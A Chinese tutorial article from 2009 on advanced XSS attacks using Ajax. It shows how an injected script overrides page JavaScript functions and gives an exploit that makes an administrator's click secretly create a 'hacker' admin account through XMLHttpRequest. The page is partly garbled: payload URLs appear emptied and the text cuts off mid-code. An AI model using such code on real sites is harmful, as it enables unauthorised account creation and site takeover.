黑客攻防:关于运用Ajax的高级XSS技术
2009-10-28 11:17:52 来源:WEB开发网核心提示:0.说明: 大多数人因为两个原因而认为xss漏洞不够强大,其中一个原因:可能你只能利用它来盗取cookie,黑客攻防:关于运用Ajax的高级XSS技术,而另一个原因则是:你(错误地)认为(利用)它需要目标点击特定的连接或者访问特定的网站,在这篇文章中我将要证明利用xss漏洞能做比盗取cookie多得多的事情,代码为:
0.说明:
大多数人因为两个原因而认为xss漏洞不够强大。其中一个原因:可能你只能利用它来盗取cookie,而另一个原因则是:你(错误地)认为(利用)它需要目标点击特定的连接或者访问特定的网站。在这篇文章中我将要证明利用xss漏洞能做比盗取cookie多得多的事情,即使你仍然需要目标去点击特定的链接。一种被称为Ajax的新技术正在网络中蔓延。Ajax技术允许你利用javascript来发送HTTP请求。一个简单的没有ajax功能的网站是像这样的(工作模式):
客户端请求 - 服务器响应 - 返回内容 - 客户端
而ajax的(工作模式)类似于:
客户端请求 - Javascript - 服务器响应 - 数据 - javascript处理
我将以展示怎样利用xss漏洞劫持javascript函数为开头,(进而)我们将看到网站过于信任javascript而造成的影响以及利用这种技术(达到的)各种可能性。
在我们开始之前,你必须做几件事:
设置magic_quotes_gpc = off
允许javascript在你的浏览器中执行
从我的网站上下载这些例子(有这样打广告的??)
1. 利用xss劫持javascript
让我们清晰的了解它,这是一个有xss漏洞的php网页代码:
这里还有一个javascript脚本文件,代码为:
function Hello()
{
alert("Hi there");
}
这非常简单,我们拥有一个包含一个按钮的网页,当点击这个按钮就会弹出一个对话框“Hi there”.
http://[host]/?xss=
Ok,现在我们在点击一下我们的按钮,发生了什么?我们没有得到“Hi there”,而得到了“hijacked”!这意味着我们能利用xss漏洞劫持javascript代码,当用户调用函数时回执行我们的代码而并非原来的。
好,我们已经知道了在url中重建javascript函数,但是如果你需要重建很多函数,通过url这样做会使你完蛋的。所以让我们重建一个新的javascript文件来包含我们需要的一切。
function Hello()
{
alert("Hijack from remote");
}
然后我们像这样提交url:
http://[host]/?xss=
让后我们再次点击我们的按钮发生了什么?“Hijack from remote”! Ok,(到此为止)我们知道了怎样正确的劫持javascript函数。
2. 利用Ajax做更多的事:xmlHttPRequest的高级运用实例
为了演示这个技术我编写了一个适用于教学的实例,(请)到我的网站下载。我将会应用它的部分代码并且解释他们。它是一个简单的管理员用来添加新管理员或者在博客上发布消息的控制面板。在页面add_message.php?author=[xss]有一个xss漏洞,这是我们将用来攻击的地方!
我编写了一个轻量级的exploit来劫持javascript函数,代码为:
function createRequest()
{
var xmlhttp;
if(window.ActiveXObject)
{
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
else if(window.XMLHttpRequest)
{
xmlHttp = new XMLHttpRequest();
}
return xmlHttp;
}
function validateForm()
{
var xmlHttp;
xmlHttp = createRequest();
url = "add_admin.php?login=hacker&passWord=hacker&email= hacker";
xmlHttp.open("GET", url, true);
xmlHttp.send(null);
document.location = "add_message.php";
}
非常好,要利用这个漏洞我们需要管理员访问这个url:
http://[host]/add_message?author=http://[host]/?xss=
当他点击提交按钮时我们的恶意代码会添加一个账户密码都为“hacker”的用户到数据库里。我们能使目标运行我们的恶意代码!但任然需要用户点击按钮……
3. 自动执行
上面的例子总是需要目标点击一个按钮来完成我们的攻击。这里有一个解决(方案)给你:
window.onload = function i
[]
更多精彩
赞助商链接